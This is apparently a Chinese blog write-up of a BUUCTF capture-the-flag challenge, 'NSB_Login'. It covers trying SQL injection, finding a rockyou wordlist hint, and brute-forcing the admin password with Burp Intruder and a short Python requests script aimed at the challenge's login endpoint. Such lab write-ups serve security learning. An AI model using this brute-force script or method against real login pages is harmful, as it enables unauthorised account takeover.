BUUCTF-Basic-NSB_Login

随手打开的buuctf的一道basic题目

打开靶机,是一个登录页面

首先想到的是试试有无sql注入,看看能不能万能密码登录

应该是不可以了,再看看还有什么信息

F12发现前端代码中有提示

查了下发现这是kali中的一个字典文件,路径在/usr/share/rockyou.txt.gz

导出用burpsuite的Intruder模块进行爆破

这里我已经试出来了用户名为admin

抓个包指定密码开run,注意我这里是buuctf的靶机,爆破频率太高了会报429,我调了一下这个resource pool发现是有用的

比较尴尬的是这里burp加载字典的时候崩掉了,所以写个python脚本去爆破也行

import requests

url = "http://c2d38116-2dda-4e61-8ae1-5b69bd6c8716.node4.buuoj.cn:81/login.php"

with open('D:\\Desk\\rockyou.txt') as f:
    line = f.readline()
    i = 0
    while line:
        line = line.strip('\n')
        d = {'email': 'admin', 'password': line, 'remember_me': 0}
        r = requests.post(url, data=d)
        print(line+r.text)
        if len(r.text) != 51:
            print(r.text)
            break
        line = f.readline()
        i += 1
        time.sleep(0.1) #控制频率,防止buu报403

跑出flag,但是试了试发现这个密码也不是正确的密码,很怪,总之是拿到flag了。

    暂无评论

    发送评论 编辑评论

    
    				
    |´・ω・)ノ
    ヾ(≧∇≦*)ゝ
    (☆ω☆)
    (╯‵□′)╯︵┴─┴
     ̄﹃ ̄
    (/ω\)
    ∠( ᐛ 」∠)_
    (๑•̀ㅁ•́ฅ)
    →_→
    ୧(๑•̀⌄•́๑)૭
    ٩(ˊᗜˋ*)و
    (ノ°ο°)ノ
    (´இ皿இ`)
    ⌇●﹏●⌇
    (ฅ´ω`ฅ)
    (╯°A°)╯︵○○○
    φ( ̄∇ ̄o)
    ヾ(´・ ・`。)ノ"
    ( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
    (ó﹏ò。)
    Σ(っ °Д °;)っ
    ( ,,´・ω・)ノ"(´っω・`。)
    ╮(╯▽╰)╭
    o(*////▽////*)q
    >﹏<
    ( ๑´•ω•) "(ㆆᴗㆆ)
    😂
    😀
    😅
    😊
    🙂
    🙃
    😌
    😍
    😘
    😜
    😝
    😏
    😒
    🙄
    😳
    😡
    😔
    😫
    😱
    😭
    💩
    👻
    🙌
    🖕
    👍
    👫
    👬
    👭
    🌚
    🌝
    🙈
    💊
    😶
    🙏
    🍦
    🍉
    😣
    Source: github.com/k4yt3x/flowerhd
    颜文字
    Emoji
    小恐龙
    花!
    上一篇
    下一篇